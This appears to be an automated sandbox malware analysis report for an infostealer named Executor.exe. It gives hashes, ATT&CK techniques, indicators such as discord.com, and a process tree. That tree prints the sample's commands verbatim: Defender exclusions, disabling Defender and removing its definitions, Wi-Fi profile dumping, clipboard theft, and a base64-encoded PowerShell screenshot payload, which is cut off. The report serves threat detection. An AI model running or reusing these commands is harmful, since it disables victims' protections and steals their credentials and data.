d7fd9ff322926d3ca000e0a0ce63ee569ca5fd0c662f86fe9e38ef449556c8c0

Analysis

max time kernel
15s
max time network
15s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
15/04/2025, 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Executor.exe
Size

7.8MB
MD5

4c0ea214e6c5c748c3c6c8cef46f3f6b
SHA1

151345ef0999e6427d8d1fd710be68726eb4c7df
SHA256

d7fd9ff322926d3ca000e0a0ce63ee569ca5fd0c662f86fe9e38ef449556c8c0
SHA512

38ab12a1fcfea790887b4cf4992388eb5160fd3d5753f25a9b46bf946eb6abdfaa86ed335e26254a0793fd3f7d4759e9cf80acaf380473be478348bfaee3bcbb
SSDEEP

196608:8WwHUOXXKAp+2kj9fZwQRCgiIKpdzjPOan7j2y283TOnOZ:yxDww8wIKppDO9iZ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5644	powershell.exe
1692	powershell.exe
3212	powershell.exe
3240	powershell.exe
2464	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Executor.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5408	cmd.exe
6020	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4896	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe
3124	Executor.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4612	tasklist.exe
3484	tasklist.exe
4584	tasklist.exe
224	tasklist.exe
880	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002b15a-21.dat	upx
behavioral1/memory/3124-25-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp	upx
behavioral1/files/0x001900000002b149-27.dat	upx
behavioral1/memory/3124-30-0x00007FFF85B00000-0x00007FFF85B27000-memory.dmp	upx
behavioral1/files/0x001900000002b158-29.dat	upx
behavioral1/memory/3124-32-0x00007FFF8AF50000-0x00007FFF8AF5F000-memory.dmp	upx
behavioral1/files/0x001900000002b154-48.dat	upx
behavioral1/files/0x001000000002b153-47.dat	upx
behavioral1/files/0x001900000002b150-46.dat	upx
behavioral1/files/0x001900000002b14f-45.dat	upx
behavioral1/files/0x001c00000002b14e-44.dat	upx
behavioral1/files/0x001900000002b14d-43.dat	upx
behavioral1/files/0x001900000002b14a-42.dat	upx
behavioral1/files/0x001d00000002b148-41.dat	upx
behavioral1/files/0x001900000002b15f-40.dat	upx
behavioral1/files/0x001900000002b15e-39.dat	upx
behavioral1/files/0x001900000002b15d-38.dat	upx
behavioral1/memory/3124-50-0x00007FFF86980000-0x00007FFF8699A000-memory.dmp	upx
behavioral1/files/0x001900000002b159-35.dat	upx
behavioral1/files/0x001900000002b157-34.dat	upx
behavioral1/memory/3124-52-0x00007FFF85800000-0x00007FFF8582B000-memory.dmp	upx
behavioral1/memory/3124-58-0x00007FFF81010000-0x00007FFF81035000-memory.dmp	upx
behavioral1/memory/3124-60-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp	upx
behavioral1/memory/3124-62-0x00007FFF85910000-0x00007FFF85929000-memory.dmp	upx
behavioral1/memory/3124-64-0x00007FFF8A3B0000-0x00007FFF8A3BD000-memory.dmp	upx
behavioral1/memory/3124-66-0x00007FFF80FD0000-0x00007FFF81003000-memory.dmp	upx
behavioral1/memory/3124-71-0x00007FFF7CFA0000-0x00007FFF7D06E000-memory.dmp	upx
behavioral1/memory/3124-70-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp	upx
behavioral1/memory/3124-74-0x00007FFF85B00000-0x00007FFF85B27000-memory.dmp	upx
behavioral1/memory/3124-73-0x00007FFF6F810000-0x00007FFF6FD43000-memory.dmp	upx
behavioral1/memory/3124-76-0x00007FFF857E0000-0x00007FFF857F4000-memory.dmp	upx
behavioral1/memory/3124-79-0x00007FFF859C0000-0x00007FFF859CD000-memory.dmp	upx
behavioral1/memory/3124-78-0x00007FFF86980000-0x00007FFF8699A000-memory.dmp	upx
behavioral1/memory/3124-81-0x00007FFF75F80000-0x00007FFF76033000-memory.dmp	upx
behavioral1/memory/3124-105-0x00007FFF81010000-0x00007FFF81035000-memory.dmp	upx
behavioral1/memory/3124-172-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp	upx
behavioral1/memory/3124-279-0x00007FFF80FD0000-0x00007FFF81003000-memory.dmp	upx
behavioral1/memory/3124-295-0x00007FFF7CFA0000-0x00007FFF7D06E000-memory.dmp	upx
behavioral1/memory/3124-306-0x00007FFF6F810000-0x00007FFF6FD43000-memory.dmp	upx
behavioral1/memory/3124-316-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp	upx
behavioral1/memory/3124-322-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp	upx
behavioral1/memory/3124-346-0x00007FFF6F810000-0x00007FFF6FD43000-memory.dmp	upx
behavioral1/memory/3124-356-0x00007FFF7CFA0000-0x00007FFF7D06E000-memory.dmp	upx
behavioral1/memory/3124-355-0x00007FFF80FD0000-0x00007FFF81003000-memory.dmp	upx
behavioral1/memory/3124-354-0x00007FFF8A3B0000-0x00007FFF8A3BD000-memory.dmp	upx
behavioral1/memory/3124-353-0x00007FFF85910000-0x00007FFF85929000-memory.dmp	upx
behavioral1/memory/3124-352-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp	upx
behavioral1/memory/3124-351-0x00007FFF81010000-0x00007FFF81035000-memory.dmp	upx
behavioral1/memory/3124-350-0x00007FFF85800000-0x00007FFF8582B000-memory.dmp	upx
behavioral1/memory/3124-349-0x00007FFF86980000-0x00007FFF8699A000-memory.dmp	upx
behavioral1/memory/3124-348-0x00007FFF8AF50000-0x00007FFF8AF5F000-memory.dmp	upx
behavioral1/memory/3124-347-0x00007FFF85B00000-0x00007FFF85B27000-memory.dmp	upx
behavioral1/memory/3124-345-0x00007FFF75F80000-0x00007FFF76033000-memory.dmp	upx
behavioral1/memory/3124-344-0x00007FFF859C0000-0x00007FFF859CD000-memory.dmp	upx
behavioral1/memory/3124-343-0x00007FFF857E0000-0x00007FFF857F4000-memory.dmp	upx
behavioral1/memory/3124-331-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
420	cmd.exe
4452	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3576	WMIC.exe
4952	WMIC.exe
5848	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2404	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3240	powershell.exe
3240	powershell.exe
5644	powershell.exe
5644	powershell.exe
3240	powershell.exe
5644	powershell.exe
2464	powershell.exe
2464	powershell.exe
2464	powershell.exe
6020	powershell.exe
6020	powershell.exe
3636	powershell.exe
3636	powershell.exe
6020	powershell.exe
3636	powershell.exe
1692	powershell.exe
1692	powershell.exe
1692	powershell.exe
6100	powershell.exe
6100	powershell.exe
6100	powershell.exe
3212	powershell.exe
3212	powershell.exe
6096	powershell.exe
6096	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4612	tasklist.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeIncreaseQuotaPrivilege	3472	WMIC.exe
Token: SeSecurityPrivilege	3472	WMIC.exe
Token: SeTakeOwnershipPrivilege	3472	WMIC.exe
Token: SeLoadDriverPrivilege	3472	WMIC.exe
Token: SeSystemProfilePrivilege	3472	WMIC.exe
Token: SeSystemtimePrivilege	3472	WMIC.exe
Token: SeProfSingleProcessPrivilege	3472	WMIC.exe
Token: SeIncBasePriorityPrivilege	3472	WMIC.exe
Token: SeCreatePagefilePrivilege	3472	WMIC.exe
Token: SeBackupPrivilege	3472	WMIC.exe
Token: SeRestorePrivilege	3472	WMIC.exe
Token: SeShutdownPrivilege	3472	WMIC.exe
Token: SeDebugPrivilege	3472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3472	WMIC.exe
Token: SeRemoteShutdownPrivilege	3472	WMIC.exe
Token: SeUndockPrivilege	3472	WMIC.exe
Token: SeManageVolumePrivilege	3472	WMIC.exe
Token: 33	3472	WMIC.exe
Token: 34	3472	WMIC.exe
Token: 35	3472	WMIC.exe
Token: 36	3472	WMIC.exe
Token: SeDebugPrivilege	5644	powershell.exe
Token: SeIncreaseQuotaPrivilege	3472	WMIC.exe
Token: SeSecurityPrivilege	3472	WMIC.exe
Token: SeTakeOwnershipPrivilege	3472	WMIC.exe
Token: SeLoadDriverPrivilege	3472	WMIC.exe
Token: SeSystemProfilePrivilege	3472	WMIC.exe
Token: SeSystemtimePrivilege	3472	WMIC.exe
Token: SeProfSingleProcessPrivilege	3472	WMIC.exe
Token: SeIncBasePriorityPrivilege	3472	WMIC.exe
Token: SeCreatePagefilePrivilege	3472	WMIC.exe
Token: SeBackupPrivilege	3472	WMIC.exe
Token: SeRestorePrivilege	3472	WMIC.exe
Token: SeShutdownPrivilege	3472	WMIC.exe
Token: SeDebugPrivilege	3472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3472	WMIC.exe
Token: SeRemoteShutdownPrivilege	3472	WMIC.exe
Token: SeUndockPrivilege	3472	WMIC.exe
Token: SeManageVolumePrivilege	3472	WMIC.exe
Token: 33	3472	WMIC.exe
Token: 34	3472	WMIC.exe
Token: 35	3472	WMIC.exe
Token: 36	3472	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3576	WMIC.exe
Token: SeSecurityPrivilege	3576	WMIC.exe
Token: SeTakeOwnershipPrivilege	3576	WMIC.exe
Token: SeLoadDriverPrivilege	3576	WMIC.exe
Token: SeSystemProfilePrivilege	3576	WMIC.exe
Token: SeSystemtimePrivilege	3576	WMIC.exe
Token: SeProfSingleProcessPrivilege	3576	WMIC.exe
Token: SeIncBasePriorityPrivilege	3576	WMIC.exe
Token: SeCreatePagefilePrivilege	3576	WMIC.exe
Token: SeBackupPrivilege	3576	WMIC.exe
Token: SeRestorePrivilege	3576	WMIC.exe
Token: SeShutdownPrivilege	3576	WMIC.exe
Token: SeDebugPrivilege	3576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3576	WMIC.exe
Token: SeRemoteShutdownPrivilege	3576	WMIC.exe
Token: SeUndockPrivilege	3576	WMIC.exe
Token: SeManageVolumePrivilege	3576	WMIC.exe
Token: 33	3576	WMIC.exe
Token: 34	3576	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4024 wrote to memory of 3124	4024	Executor.exe	82
PID 4024 wrote to memory of 3124	4024	Executor.exe	82
PID 3124 wrote to memory of 2468	3124	Executor.exe	85
PID 3124 wrote to memory of 2468	3124	Executor.exe	85
PID 3124 wrote to memory of 2648	3124	Executor.exe	86
PID 3124 wrote to memory of 2648	3124	Executor.exe	86
PID 3124 wrote to memory of 2656	3124	Executor.exe	87
PID 3124 wrote to memory of 2656	3124	Executor.exe	87
PID 3124 wrote to memory of 4876	3124	Executor.exe	91
PID 3124 wrote to memory of 4876	3124	Executor.exe	91
PID 3124 wrote to memory of 3644	3124	Executor.exe	94
PID 3124 wrote to memory of 3644	3124	Executor.exe	94
PID 4876 wrote to memory of 4612	4876	cmd.exe	96
PID 4876 wrote to memory of 4612	4876	cmd.exe	96
PID 2468 wrote to memory of 3240	2468	cmd.exe	97
PID 2468 wrote to memory of 3240	2468	cmd.exe	97
PID 2656 wrote to memory of 2384	2656	cmd.exe	98
PID 2656 wrote to memory of 2384	2656	cmd.exe	98
PID 2648 wrote to memory of 5644	2648	cmd.exe	99
PID 2648 wrote to memory of 5644	2648	cmd.exe	99
PID 3644 wrote to memory of 3472	3644	cmd.exe	100
PID 3644 wrote to memory of 3472	3644	cmd.exe	100
PID 3124 wrote to memory of 4004	3124	Executor.exe	102
PID 3124 wrote to memory of 4004	3124	Executor.exe	102
PID 4004 wrote to memory of 4076	4004	cmd.exe	104
PID 4004 wrote to memory of 4076	4004	cmd.exe	104
PID 3124 wrote to memory of 560	3124	Executor.exe	167
PID 3124 wrote to memory of 560	3124	Executor.exe	167
PID 560 wrote to memory of 2076	560	cmd.exe	107
PID 560 wrote to memory of 2076	560	cmd.exe	107
PID 3124 wrote to memory of 4848	3124	Executor.exe	108
PID 3124 wrote to memory of 4848	3124	Executor.exe	108
PID 4848 wrote to memory of 3576	4848	cmd.exe	110
PID 4848 wrote to memory of 3576	4848	cmd.exe	110
PID 3124 wrote to memory of 1540	3124	Executor.exe	111
PID 3124 wrote to memory of 1540	3124	Executor.exe	111
PID 1540 wrote to memory of 4952	1540	cmd.exe	113
PID 1540 wrote to memory of 4952	1540	cmd.exe	113
PID 3124 wrote to memory of 1808	3124	Executor.exe	114
PID 3124 wrote to memory of 1808	3124	Executor.exe	114
PID 1808 wrote to memory of 2464	1808	cmd.exe	116
PID 1808 wrote to memory of 2464	1808	cmd.exe	116
PID 3124 wrote to memory of 332	3124	Executor.exe	117
PID 3124 wrote to memory of 332	3124	Executor.exe	117
PID 3124 wrote to memory of 5656	3124	Executor.exe	118
PID 3124 wrote to memory of 5656	3124	Executor.exe	118
PID 5656 wrote to memory of 3484	5656	cmd.exe	121
PID 5656 wrote to memory of 3484	5656	cmd.exe	121
PID 332 wrote to memory of 4584	332	cmd.exe	122
PID 332 wrote to memory of 4584	332	cmd.exe	122
PID 3124 wrote to memory of 5800	3124	Executor.exe	123
PID 3124 wrote to memory of 5800	3124	Executor.exe	123
PID 3124 wrote to memory of 5408	3124	Executor.exe	125
PID 3124 wrote to memory of 5408	3124	Executor.exe	125
PID 3124 wrote to memory of 6056	3124	Executor.exe	126
PID 3124 wrote to memory of 6056	3124	Executor.exe	126
PID 3124 wrote to memory of 5332	3124	Executor.exe	129
PID 3124 wrote to memory of 5332	3124	Executor.exe	129
PID 3124 wrote to memory of 420	3124	Executor.exe	131
PID 3124 wrote to memory of 420	3124	Executor.exe	131
PID 3124 wrote to memory of 6048	3124	Executor.exe	133
PID 3124 wrote to memory of 6048	3124	Executor.exe	133
PID 3124 wrote to memory of 5988	3124	Executor.exe	134
PID 3124 wrote to memory of 5988	3124	Executor.exe	134

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4192	attrib.exe
2392	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Executor.exe
"C:\Users\Admin\AppData\Local\Temp\Executor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4024
- C:\Users\Admin\AppData\Local\Temp\Executor.exe
  "C:\Users\Admin\AppData\Local\Temp\Executor.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Executor.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Executor.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('dont run more than 1 time', 0, 'disable antivirus', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('dont run more than 1 time', 0, 'disable antivirus', 32+16);close()"
      4⤵
      PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:332
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5656
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5800
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:6020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:6056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5332
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:420
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:6048
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5988
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIA